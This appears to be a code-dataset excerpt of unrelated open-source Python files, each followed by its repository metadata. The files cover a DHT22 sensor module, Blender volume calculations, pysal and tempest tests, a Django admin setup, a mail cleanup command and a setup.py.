for word, count in word_counts.most_common():
if count > 0: print k, word, count
topic_names = ["Big Data and programming languages",
"Python and statistics",
"databases",
"machine learning"]
for document, topic_counts in zip(documents, document_topic_counts):
print document
for topic, count in topic_counts.most_common():
if count > 0:
print topic_names[topic], count,
print
|
joelgrus/data-science-from-scratch
|
first-edition/code/natural_language_processing.py
|
Python
|
mit
| 10,007
|
import re
import signal
import sys
import time
import Adafruit_DHT
from utils.decorators import in_thread, log_exceptions
from utils.io import non_empty_input, non_empty_positive_numeric_input, log, Color, wrh_input
from wrh_engine import module_base as base_module
ninput = non_empty_input
iinput = non_empty_positive_numeric_input
class DHT22Module(base_module.Module):
"""
This class works with DHT22 temperature and humidity sensor.
Adafruit_Python_DHT package is required by this module.
Installation instructions:
$ git clone https://github.com/adafruit/Adafruit_Python_DHT.git
$ cd Adafruit_Python_DHT
$ sudo python setup.py install
"""
TYPE_NAME = "DHT22 TEMP./HUM. SENSOR"
CONFIGURATION_LINE_PATTERN = "([0-9]{1,9});(.+?);([1-9][0-9]{0,9});([1-9][0-9]{0,9});(.+)$"
def __init__(self, configuration_file_line=None):
self.last_temperature = self.last_humidity = self.socket = None
self.interval = 60
base_module.Module.__init__(self, configuration_file_line)
@staticmethod
def get_starting_command():
"""
Returns command used to start module as a new process.
:return: Command to be executed when starting new process
"""
return ["/usr/bin/python3.6", "-m", "modules.dht22.dht22"]
def get_configuration_line(self):
"""
Creates module configuration line.
:return: Properly formatted configuration file line
"""
values = (self.id, self.name, self.gpio, self.interval, self.port)
return ('{};' * len(values))[:-1].format(*values)
def _parse_configuration_line(self, configuration_file_line):
"""
Initializes class variables from provided configuration line.
"""
matches = re.search(self.CONFIGURATION_LINE_PATTERN, configuration_file_line)
self.id = int(matches.group(1))
self.name = matches.group(2)
self.gpio = int(matches.group(3))
self.interval = int(matches.group(4))
self.port = matches.group(5)
def get_measurement(self):
"""
Returns two float variables: humidity and temperature.
"""
return Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, self.gpio)
def get_module_description(self):
"""
Returns module description to be viewed by user.
"""
return "DHT22 temperature and humidity sensor"
def run_registration_procedure(self, new_id):
"""
Runs interactive procedure to register new module.
"""
base_module.Module.run_registration_procedure(self, new_id)
self.gpio = iinput("Please input gpio pin number to which sensor is connected: ")
self.interval = iinput("Please input interval (in minutes) for taking consecutive measurements: ")
self.port = iinput("Please input port on which this module will be listening for commands: ")
def edit(self):
"""
Runs interactive procedure to edit module.
Returns connection status and response.
"""
log('Provide new module information (leave fields blank if you don\'t want to change)')
self.name = wrh_input(message='New module\'s name: ', allowed_empty=True) or self.name
self.gpio = iinput("Please input new gpio pin number to which sensor is connected: ",
allowed_empty=True) or self.gpio
self.interval = iinput("Please input new interval (in minutes) for taking consecutive measurements: ",
allowed_empty=True) or self.interval
self.port = iinput("Please input new port on which this module will be listening for commands: ",
allowed_empty=True) or self.port
def start_work(self):
"""
Starts working procedure.
"""
base_module.Module.start_work(self)
self._measurement_thread()
while self._should_end is False:
signal.pause()
def get_html_representation(self, website_host_address):
"""
Returns html code to include in website.
"""
if not self.html_repr:
with open('modules/dht22/html/repr.html', 'r') as f:
html = f.read()
self.html_repr = html.format(id=self.id, name=self.name, port=self.port)
return self.html_repr
@in_thread
@log_exceptions()
def _measurement_thread(self):
while self._should_end is False:
try:
self.last_humidity, self.last_temperature = self.get_measurement()
self._send_measurement({'humidity': self.last_humidity, 'temperature': self.last_temperature})
time.sleep(self.interval * 60)
except AttributeError:
pass
def _react_to_connection(self, connection, _):
if self.last_temperature is not None and self.last_humidity is not None:
connection.send(f'{self.last_humidity:0.1f};{self.last_temperature:0.1f}'.encode('utf-8'))
else:
connection.send('?;?'.encode('utf-8'))
if __name__ == "__main__":
try:
log('DHT22 module: started.')
conf_line = sys.argv[1]
dht22 = DHT22Module(conf_line)
dht22.start_work()
except Exception as e:
log(e, Color.EXCEPTION)
|
Waszker/WRH---Raspberry
|
modules/dht22/dht22.py
|
Python
|
gpl-2.0
| 5,335
|
# vim:ts=4:et
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from mathutils import Vector
from ..utils import collect_modifiers
def sortedSum(terms):
sum = 0
for t in sorted(terms, key=abs):
sum += t
return sum
def calcVolumeCentroid(mesh):
terms=[]
terms_x = []
terms_y = []
terms_z = []
num_tetras = 0
for face in mesh.polygons:
a = mesh.vertices[face.vertices[0]].co
b = mesh.vertices[face.vertices[1]].co
for i in range(2, len(face.vertices)):
c = mesh.vertices[face.vertices[i]].co
vp = [ a.y*b.z*c.x, a.z*b.x*c.y, a.x*b.y*c.z]
vm = [-a.z*b.y*c.x, -a.x*b.z*c.y, -a.y*b.x*c.z]
terms.extend(vp)
terms.extend(vm)
terms_x.extend([a.x * vp[0], b.x * vp[0], c.x * vp[0]])
terms_y.extend([a.y * vp[0], b.y * vp[0], c.y * vp[0]])
terms_z.extend([a.z * vp[0], b.z * vp[0], c.z * vp[0]])
terms_x.extend([a.x * vp[1], b.x * vp[1], c.x * vp[1]])
terms_y.extend([a.y * vp[1], b.y * vp[1], c.y * vp[1]])
terms_z.extend([a.z * vp[1], b.z * vp[1], c.z * vp[1]])
terms_x.extend([a.x * vp[2], b.x * vp[2], c.x * vp[2]])
terms_y.extend([a.y * vp[2], b.y * vp[2], c.y * vp[2]])
terms_z.extend([a.z * vp[2], b.z * vp[2], c.z * vp[2]])
terms_x.extend([a.x * vm[0], b.x * vm[0], c.x * vm[0]])
terms_y.extend([a.y * vm[0], b.y * vm[0], c.y * vm[0]])
terms_z.extend([a.z * vm[0], b.z * vm[0], c.z * vm[0]])
terms_x.extend([a.x * vm[1], b.x * vm[1], c.x * vm[1]])
terms_y.extend([a.y * vm[1], b.y * vm[1], c.y * vm[1]])
terms_z.extend([a.z * vm[1], b.z * vm[1], c.z * vm[1]])
terms_x.extend([a.x * vm[2], b.x * vm[2], c.x * vm[2]])
terms_y.extend([a.y * vm[2], b.y * vm[2], c.y * vm[2]])
terms_z.extend([a.z * vm[2], b.z * vm[2], c.z * vm[2]])
b = c
num_tetras += 1
vol = sortedSum(terms) / 6
if vol > 0:
c_x = sortedSum(terms_x)
c_y = sortedSum(terms_y)
c_z = sortedSum(terms_z)
cent = Vector((c_x, c_y, c_z)) / (6 * 4 * vol)
else:
cent = Vector((0, 0, 0))
return vol, cent
def obj_volume_centroid(obj):
origin = Vector((0, 0, 0))
if type(obj.data) != bpy.types.Mesh:
return (0, 0), (origin, origin)
if obj.muproperties.collider and obj.muproperties.collider != 'MU_COL_NONE':
return (0, 0), (origin, origin)
#FIXME skin_mesh = obj.to_mesh(bpy.context.scene, True, 'PREVIEW')
#FIXME ext_mesh = obj.to_mesh(bpy.context.scene, True, 'RENDER')
#FIXME horible hack until I figure out how to get a render mode depsgraph
modifiers = collect_modifiers(obj)
depsgraph = bpy.context.evaluated_depsgraph_get()
skin_mesh = obj.evaluated_get(depsgraph).to_mesh()
skin_vol, skin_cent = calcVolumeCentroid(skin_mesh)
obj.to_mesh_clear()
for mod in modifiers:
mod.show_viewport = False
depsgraph.update()
ext_mesh = obj.evaluated_get(depsgraph).to_mesh()
ext_vol, ext_cent = calcVolumeCentroid(ext_mesh)
obj.to_mesh_clear()
for mod in modifiers:
mod.show_viewport = True
return (skin_vol, ext_vol), (skin_cent, ext_cent)
def obj_volume(obj):
return obj_volume_centroid(obj)[0]
def model_volume_centroid(obj, special={}):
origin = Vector((0, 0, 0))
base_pos = obj.matrix_world @ origin
svols = []
evols = []
scents_x = []
scents_y = []
scents_z = []
ecents_x = []
ecents_y = []
ecents_z = []
def group(g):
for o in g.objects:
recurse(o)
for c in g.children:
group(c)
def recurse(o):
if o.muproperties.modelType in special:
return
pos = o.matrix_world @ origin
v, c = obj_volume_centroid(o)
svols.append(v[0])
evols.append(v[1])
sc = c[0] + pos
ec = c[1] + pos
scents_x.append(v[0]*sc.x)
scents_y.append(v[0]*sc.y)
scents_z.append(v[0]*sc.z)
ecents_x.append(v[1]*ec.x)
ecents_y.append(v[1]*ec.y)
ecents_z.append(v[1]*ec.z)
if (o.muproperties.collider
and o.muproperties.collider != 'MU_COL_NONE'):
return
for c in o.children:
recurse(c)
if o.instance_collection and o.instance_type == 'COLLECTION':
group(o.instance_collection)
recurse(obj)
skinvol = sortedSum(svols)
extvol = sortedSum(evols)
sc_x = sortedSum(scents_x)
sc_y = sortedSum(scents_y)
sc_z = sortedSum(scents_z)
ec_x = sortedSum(ecents_x)
ec_y = sortedSum(ecents_y)
ec_z = sortedSum(ecents_z)
skincent = Vector((sc_x, sc_y, sc_z))
if skinvol != 0:
skincent /= skinvol
extcent = Vector((ec_x, ec_y, ec_z))
if extvol != 0:
extcent /= extvol
return (skinvol, extvol), (skincent - base_pos, extcent - base_pos)
def model_volume(obj, special={}):
return model_volume_centroid(obj, special)[0]
def find_com(objects):
origin = Vector((0, 0, 0))
base_pos = objects[0].matrix_world @ origin
weighted_x = [None] * len(objects)
weighted_y = [None] * len(objects)
weighted_z = [None] * len(objects)
vols = [None] * len(objects)
for i, obj in enumerate(objects):
pos = obj.matrix_world @ origin - base_pos
if obj.instance_collection and obj.instance_type == 'COLLECTION':
(svol, evol), (scent, escent) = model_volume_centroid(obj)
elif obj.data and type(obj.data) == bpy.types.Mesh:
(svol, evol), (scent, escent) = obj_volume_centroid(obj)
else:
svol = 0
scent = origin
wpos = (pos + scent) * svol
weighted_x[i] = wpos.x
weighted_y[i] = wpos.y
weighted_z[i] = wpos.z
vols[i] = svol
vol = sortedSum(vols)
x = sortedSum(weighted_x)
y = sortedSum(weighted_y)
z = sortedSum(weighted_z)
pos = Vector((x, y, z))
if vol != 0:
pos /= vol
return pos + base_pos
|
taniwha-qf/io_object_mu
|
export_mu/volume.py
|
Python
|
gpl-2.0
| 6,925
|
import unittest
import pysal
import scipy
import numpy as np
from pysal.spreg.ml_lag import ML_Lag
from pysal.spreg import utils
from pysal.common import RTOL
@unittest.skipIf(int(scipy.__version__.split(".")[1]) < 11,
"Max Likelihood requires SciPy version 11 or newer.")
class TestMLError(unittest.TestCase):
def setUp(self):
db = pysal.open(pysal.examples.get_path("baltim.dbf"),'r')
self.ds_name = "baltim.dbf"
self.y_name = "PRICE"
self.y = np.array(db.by_col(self.y_name)).T
self.y.shape = (len(self.y),1)
self.x_names = ["NROOM","AGE","SQFT"]
self.x = np.array([db.by_col(var) for var in self.x_names]).T
ww = pysal.open(pysal.examples.get_path("baltim_q.gal"))
self.w = ww.read()
ww.close()
self.w_name = "baltim_q.gal"
self.w.transform = 'r'
def test_model1(self):
reg = ML_Lag(self.y,self.x,w=self.w,name_y=self.y_name,name_x=self.x_names,\
name_w=self.w_name,name_ds=self.ds_name)
betas = np.array([[-6.04040164],
[ 3.48995114],
[-0.20103955],
[ 0.65462382],
[ 0.62351143]])
np.testing.assert_allclose(reg.betas,betas,RTOL)
u = np.array([ 47.51218398])
np.testing.assert_allclose(reg.u[0],u,RTOL)
predy = np.array([-0.51218398])
np.testing.assert_allclose(reg.predy[0],predy,RTOL)
n = 211
np.testing.assert_allclose(reg.n,n,RTOL)
k = 5
np.testing.assert_allclose(reg.k,k,RTOL)
y = np.array([ 47.])
np.testing.assert_allclose(reg.y[0],y,RTOL)
x = np.array([ 1. , 4. , 148. , 11.25])
np.testing.assert_allclose(reg.x[0],x,RTOL)
e = np.array([ 41.99251608])
np.testing.assert_allclose(reg.e_pred[0],e,RTOL)
my = 44.307180094786695
np.testing.assert_allclose(reg.mean_y,my)
sy = 23.606076835380495
np.testing.assert_allclose(reg.std_y,sy)
vm = np.array([ 28.57288755, 1.42341656, 0.00288068, 0.02956392, 0.00332139])
np.testing.assert_allclose(reg.vm.diagonal(),vm,RTOL)
sig2 = 216.27525647243797
np.testing.assert_allclose(reg.sig2,sig2,RTOL)
pr2 = 0.6133020721559487
np.testing.assert_allclose(reg.pr2,pr2)
std_err = np.array([ 5.34536131, 1.19307022, 0.05367198, 0.17194162, 0.05763147])
np.testing.assert_allclose(reg.std_err,std_err,RTOL)
logll = -875.92771143484833
np.testing.assert_allclose(reg.logll,logll,RTOL)
aic = 1761.8554228696967
np.testing.assert_allclose(reg.aic,aic,RTOL)
schwarz = 1778.614713537077
np.testing.assert_allclose(reg.schwarz,schwarz,RTOL)
if __name__ == '__main__':
unittest.main()
|
schmidtc/pysal
|
pysal/spreg/tests/test_ml_lag.py
|
Python
|
bsd-3-clause
| 2,788
|
"""
Base utilities to build API operation managers and objects on top of.
"""
class Manager(object):
"""
Managers interact with a particular type of resource and provide CRUD
operations for them.
"""
resource_class = None
def __init__(self, api):
self.api = api
def _list(self, url):
resp, body = self.api.client.get(url)
return [self.resource_class(self, res) for res in body]
def _get(self, url):
resp, body = self.api.client.get(url)
return self.resource_class(self, body)
def _create(self, url, body):
resp, body = self.api.client.post(url, body=body)
return self.resource_class(self, body)
def _delete(self, url):
resp, body = self.api.client.delete(url)
def _update(self, url, body):
resp, body = self.api.client.put(url, body=body)
class Resource(object):
"""
A resource represents a particular instance of a resource.
It's pretty much just a bag for attributes.
"""
def __init__(self, manager, info):
self.manager = manager
self._info = info
self._add_details(info)
def _add_details(self, info):
for (k, v) in info.iteritems():
setattr(self, k, v)
def __getattr__(self, k):
self.get()
if k not in self.__dict__:
raise AttributeError(k)
else:
return self.__dict__[k]
def __repr__(self):
reprkeys = sorted(k for k in self.__dict__.keys() if k[0] != '_' and k != 'manager')
info = ", ".join("%s=%s" % (k, getattr(self, k)) for k in reprkeys)
return "<%s %s>" % (self.__class__.__name__, info)
def get(self):
# Avoid triggering __getattr__ recursively.
new = self.manager.get(self.__dict__['id'])
self._add_details(new._info)
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if hasattr(self, 'id') and hasattr(other, 'id'):
return self.id == other.id
return self._info == other._info
def getid(obj):
"""
Abstracts the common pattern of allowing both an object or an object's ID
(integer) as a parameter when dealing with relationships.
"""
try:
return obj.id
except AttributeError:
return int(obj)
|
jacobian-archive/python-storymarket
|
storymarket/base.py
|
Python
|
bsd-3-clause
| 2,426
|
from django.contrib import admin
from django_tablib.admin import TablibAdmin
from django import forms
from gigs.gig_registry import models
class AutofillUUIDForm(forms.ModelForm):
class Meta:
model = None
def __init__(self, *args, **kwargs):
# TODO(shauno): This method stops working once we have multiple
# users adding gigs at the same time. Two users pull up the same
# form and they will get the same UUID, and the first one to
# submit gets to use it, the second one will not be able to submit
# their form because the UUID is not unique. Might be better to
# generate on save, but this is an implicit action, and may not
# be intuitive for the user
#
print args
print kwargs
if not kwargs.get('instance', None):
if not kwargs.get('initial', None):
kwargs['initial'] = {}
kwargs['initial'].update({'uuid': self.Meta.model.objects.get_next_UUID()})
super(AutofillUUIDForm, self).__init__(*args, **kwargs)
class MusicianAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Musician
class MusicianAdmin(admin.ModelAdmin):
form = MusicianAutofillUUIDForm
class MusicianInline(admin.TabularInline):
form = MusicianAutofillUUIDForm
fields = ['musician', 'started', 'finished', 'date_of_birth', 'instrument',]
model = models.Musician
class MembershipInline(admin.TabularInline):
model = models.BandMembership
verbose_name = "Band Member"
verbose_name_plural = "Band Members"
fields = ['musician', 'started', 'finished']
extra = 3
class BandAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Band
class BandAdmin(admin.ModelAdmin):
form = BandAutofillUUIDForm
inlines = [MembershipInline]
list_display = ['name']
search_fields = ['name', 'comment']
class BandInline(admin.TabularInline):
model = models.Gig.bands.through
def formfield_for_foreignkey(self, db_field, request, **kwargs):
# limit the choice of stages to stages listed
# for the gig's venue
if db_field.name == "stage":
try:
gig = request.gig
kwargs["queryset"] = models.Stage.objects.filter(venue__exact=gig.venue)
except AttributeError:
pass
return super(BandInline, self).formfield_for_foreignkey(db_field, request, **kwargs)
def get_venue_id(gig):
return gig.venue.id
class GigAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Gig
class GigAdmin(TablibAdmin):
form = GigAutofillUUIDForm
fieldsets = [
(None, {'fields': ['name', 'venue', 'cost', 'gig_type', 'source']}),
('Dates', {'fields': ['start', 'finish']}),
('Metadata', {'fields': ['uuid','comment']}),
]
formats = ['csv', 'xls']
headers = {
'name': 'name',
'start': 'start',
'finish': 'finish',
'cost': 'cost',
'comment': 'comment',
'venue.id': get_venue_id,
}
inlines = (BandInline,)
list_filter = ('venue', 'bands',)
search_fields = ['name', 'venue__name', 'comment']
def get_form(self, request, obj=None, **kwargs):
# add the gig object to the request so that it
# can be passed down to the inlines. The inlines
# use the object to limit the chocies in drop-
# downs to relevant choices
request.gig = obj
return super(GigAdmin, self).get_form(request, obj, **kwargs)
def get_gig_type(obj):
return "%s" % (obj.gig_type.name)
get_gig_type.short_description = 'Gig type'
get_gig_type.admin_order_field = 'gig_type__name'
def get_venue_name(obj):
return "%s" % (obj.venue.name)
get_venue_name.short_description = 'Venue'
get_venue_name.admin_order_field = 'venue__name'
def get_gig(obj):
return obj
get_gig.short_description = 'Gig'
get_gig.admin_order_field = 'id'
list_display = [get_gig, get_venue_name, 'name', 'start', 'cost', get_gig_type]
ordering = ['-id']
def get_location_id(venue):
return venue.location.id
class VenueAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Venue
class VenueAdmin(TablibAdmin):
form = VenueAutofillUUIDForm
list_display = ['name', 'location', 'established', 'venue_type', 'status']
list_filter = ('venue_type', 'status', 'location__suburb')
search_fields = ['name', 'venue_type', 'location__suburb', 'comment']
formats = ['csv', 'xls']
headers={
'name': 'name',
'uid': 'uid',
'location.id': get_location_id,
'established': 'established',
'venue_type':'venue_type',
'status':'status',
'status_notes':'status_notes',
'comment':'comment',
}
class LocationAutofillUUIDForm(AutofillUUIDForm):
class Meta:
model = models.Location
class LocationAdmin(TablibAdmin):
form = LocationAutofillUUIDForm
list_display = ['street_address', 'building_name', 'suburb', 'state', 'post_code', 'lat', 'lon']
list_filter = ('suburb', 'post_code', 'state', 'building_name')
fieldsets = [
('Address',
{'fields':
[
'building_name',
'street_address',
'suburb',
'state',
'post_code',
'country',
]
}
),
('Co-ordinates',
{'fields':
[
'lat',
'lon',
]
}
),
('Metadata',
{'fields':
[
'uuid',
'comment',
]
}
)
]
formats = ['csv', 'xls']
search_fields = ['street_address', 'suburb', 'post_code', 'state', 'building_name', 'comment']
admin.site.register(models.Band, BandAdmin)
admin.site.register(models.Musician, MusicianAdmin)
admin.site.register(models.Owner)
admin.site.register(models.Venue, VenueAdmin)
admin.site.register(models.Location, LocationAdmin)
admin.site.register(models.Genre)
admin.site.register(models.Gig, GigAdmin)
admin.site.register(models.GigType)
admin.site.register(models.Source)
admin.site.register(models.SourceType)
admin.site.register(models.BandMembership)
admin.site.register(models.Stage)
|
shaunokeefe/gigs
|
gigs/gig_registry/admin.py
|
Python
|
bsd-3-clause
| 6,616
|
#!/usr/bin/env python
# encoding: utf-8
# ----------------------------------------------------------------------------
import datetime
import logging
from optparse import make_option
from django.core.management.base import BaseCommand
from django_yubin.management.commands import create_handler
from django_yubin.models import Message
class Command(BaseCommand):
help = 'Delete the mails created before -d days (default 90)'
option_list = BaseCommand.option_list + (
make_option('-d', '--days', type='int', default=90,
help="Cleanup mails older than this many days, defaults to 90."),
)
def handle(self, verbosity, days, **options):
# Delete mails and their related logs and queued created before X days
logger = logging.getLogger('django_yubin')
handler = create_handler(verbosity)
logger.addHandler(handler)
today = datetime.date.today()
cutoff_date = today - datetime.timedelta(days)
count = Message.objects.filter(date_created__lt=cutoff_date).count()
Message.objects.filter(date_created__lt=cutoff_date).delete()
logger.warning("Deleted %s mails created before %s " %
(count, cutoff_date))
|
sergei-maertens/django-yubin
|
django_yubin/management/commands/cleanup_mail.py
|
Python
|
apache-2.0
| 1,233
|
print "How old are you?"
age = int(raw_input())
if age >= 21:
print "Yay, you can drink legally!"
print "You are", age, "years old."
|
jordantdavis/CourseProblemSolvingWithComputers
|
InClassExamples/DrinkingAge.py
|
Python
|
mit
| 142
|
# Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import time
from tempest.api.compute import base
from tempest import test
class TenantUsagesTestJSON(base.BaseV2ComputeAdminTest):
@classmethod
def setup_clients(cls):
super(TenantUsagesTestJSON, cls).setup_clients()
cls.adm_client = cls.os_adm.tenant_usages_client
cls.client = cls.os.tenant_usages_client
@classmethod
def resource_setup(cls):
super(TenantUsagesTestJSON, cls).resource_setup()
cls.tenant_id = cls.client.tenant_id
# Create a server in the demo tenant
cls.create_test_server(wait_until='ACTIVE')
time.sleep(2)
now = datetime.datetime.now()
cls.start = cls._parse_strtime(now - datetime.timedelta(days=1))
cls.end = cls._parse_strtime(now + datetime.timedelta(days=1))
@classmethod
def _parse_strtime(cls, at):
# Returns formatted datetime
return at.strftime('%Y-%m-%dT%H:%M:%S.%f')
@test.idempotent_id('062c8ae9-9912-4249-8b51-e38d664e926e')
def test_list_usage_all_tenants(self):
# Get usage for all tenants
tenant_usage = self.adm_client.list_tenant_usages(
start=self.start, end=self.end, detailed="1")['tenant_usages'][0]
self.assertEqual(len(tenant_usage), 8)
@test.idempotent_id('94135049-a4c5-4934-ad39-08fa7da4f22e')
def test_get_usage_tenant(self):
# Get usage for a specific tenant
tenant_usage = self.adm_client.show_tenant_usage(
self.tenant_id, start=self.start, end=self.end)['tenant_usage']
self.assertEqual(len(tenant_usage), 8)
@test.idempotent_id('9d00a412-b40e-4fd9-8eba-97b496316116')
def test_get_usage_tenant_with_non_admin_user(self):
# Get usage for a specific tenant with non admin user
tenant_usage = self.client.show_tenant_usage(
self.tenant_id, start=self.start, end=self.end)['tenant_usage']
self.assertEqual(len(tenant_usage), 8)
|
pczerkas/tempest
|
tempest/api/compute/admin/test_simple_tenant_usage.py
|
Python
|
apache-2.0
| 2,598
|
import os
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
import mpf
# Test
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errcode = pytest.main(self.test_args)
sys.exit(errcode)
# README
readme = ""
with open("README.md", "r") as f:
readme = f.read()
# Packages
packages = [
"mpf"
]
# Requirements
def strip_comments(l):
return l.split("#", 1)[0].strip()
def reqs(*f):
return list(filter(None, [strip_comments(l) for l in open(os.path.join(os.getcwd(), *f)).readlines()]))
requirements = reqs("requirements.txt")
test_requirements = reqs("requirements-dev.txt")
test_requirements = requirements + test_requirements[1:]
setup(
name="mpf",
version=mpf.__version__,
description="",
long_description=readme,
author="Vayel",
author_email="vincent.lefoulon@free.fr",
url="https://github.com/Vayel/MPF",
packages=packages,
package_dir={"mpf": "mpf"},
include_package_data=True,
install_requires=requirements,
license="MIT",
zip_safe=False,
keywords="mpf",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.4"
],
cmdclass={"test": PyTest},
tests_require=test_requirements
)
|
tartopum/MPF
|
setup.py
|
Python
|
mit
| 1,662
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.